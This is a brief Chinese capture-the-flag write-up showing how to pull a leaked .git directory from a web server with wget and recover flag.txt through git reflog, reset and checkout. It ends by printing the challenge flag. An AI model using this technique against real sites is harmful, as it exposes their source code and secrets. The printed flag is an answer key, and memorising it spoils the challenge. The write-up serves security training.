猜测git泄露
url:http://ip_address/.git
发现确实存在git泄露
解题
在kali中递归下载 .git目录文件 👇得到一个文件夹
wget -r http://ip_address/.git
在上一步得到的文件夹中执行命令👇
1、
git reflog //查看执行的命令日志
2、
git reset 13ce8d0 //回退到该版本的版本库 多试几个commit id
3、
git status
git checkout -- flag.txt
//将暂存区的 flag.txt 还原到工作区
这样就可以在原文件中看到flag.txt
最终flag在40c6d51中
flag{git_is_good_distributed_version_control_system}